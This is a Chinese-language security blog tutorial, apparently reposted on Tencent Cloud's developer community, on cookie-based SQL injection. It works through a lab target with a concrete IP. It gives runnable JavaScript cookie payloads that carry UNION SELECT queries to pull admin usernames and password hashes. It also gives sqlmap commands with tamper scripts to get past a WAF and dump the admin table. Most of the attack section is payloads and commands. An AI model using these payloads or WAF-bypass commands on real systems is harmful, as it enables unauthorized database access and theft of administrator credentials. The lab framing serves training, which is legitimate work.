开发者社区

文档建议反馈控制台

腾讯云架构师技术同盟

文章/答案/技术大牛

发布

社区首页 >专栏 >cookie注入的三种方法（靶场实例绕过WAF）

cookie注入的三种方法（靶场实例绕过WAF）

作者头像

字节脉搏实验室

发布于 2020-05-14 22:33:18

发布于 2020-05-14 22:33:18

8K0

举报

文章被收录于专栏：字节脉搏实验室字节脉搏实验室

一、知识点介绍

1.什么是cookie注入？

cookie注入的原理是：就是修改cookie的值进行注入

♦cookie注入其原理也和平时的注入一样，只不过注入参数换成了cookie

♦要进行cookie注入，我们首先就要修改cookie，这里就需要使用到Javascript语言了。另外cookie注入的形成有两个必须条件：

条件1是：程序对get和post方式提交的数据进行了过滤，但未对cookie提交的数据库进行过滤。

条件2是：在条件1的基础上还需要程序对提交数据获取方式是直接request("xxx")的方式，未指明使用request对象的具体方法进行获取，也就是说用request这个方法的时候获取的参数可以是是在URL后面的参数也可以是cookie里面的参数这里没有做筛选，之后的原理就像我们的sql注入一样了。

2.怎样cookie注入？

cookie注入跟普通sql注入过程一样：

1.判断是不是注入点

2.得到字段总数

3.查选表名

4.查选列名

5.脱裤

使用到Javascript语言就先理解一下这几个概念：

javascript:alert(document.cookie="id="+escape("284"))

document.cookie:表示当前浏览器中的cookie变量

alert（）:表示弹出一个对话框，在该对话框中单击“确定”按钮确认信息。

escape():该函数用于对字符串进行编码。

cookie注入的原理在于更改本地的cookie，从而利用cookie来提交非法语句。

这里举例采用tkaq的靶场实例：

方法一：

说明有waf。

在ie浏览器先正常访问http://117.167.136.245:10181/shownews.asp?id=169

再清空地址栏输入

javascript:alert(document.cookie="id="+escape("169"));

手动补充javascript: 就弹窗了

再次访问http://117.167.136.245:10181/shownews.asp? 返回正常

再次验证了是cookie注入，构造语句暴出位置，（已order by试过字段为10）并猜解表名，说明存在admin这个表

javascript:alert(document.cookie="id="+escape("169+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"));

访问查看http://117.167.136.245:10181/shownews.asp?

javascript:alert(document.cookie="id="+escape("169+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"));

访问查看http://117.167.136.245:10181/shownews.asp?

MD5解密得

然后拿到管理员账号密码就可以区登录后台了，这里域名加admin就是后台

方法二：

采用官方wp，用插件的方法

点击+号新增一个Request头。

还有一种就是用sqlmap跑

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=171" --level 2

可以看出对方的DBMS是ACCESS

前面已经知道有waf拦截危险字符，所以绕过waf的sqlmap语句为

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=171" --level 2 –tamper=space2commet,versionedmorekeywords.py -v 3 --tables

（10线程跑的）爆出数据库有8个表；

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=171" --level 2 --columns -T"admin" -D"Microsoft_Access_masterdb"

爆表admin的列：

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=171" --level 2 --dump -T admin -C "username,password"

爆表admin中username和password：

Cmd5解密即可

参考：https://www.cnblogs.com/joker-vip/p/12746326.html

https://www.cnblogs.com/insane-Mr-Li/p/9142681.html

https://www.cnblogs.com/lovesickness/protected/p/12745357.html

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2020-05-13，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自字节脉搏实验室微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

0 条评论

热度

最新

目录

一、知识点介绍
- 1.什么是cookie注入？
- 2.怎样cookie注入？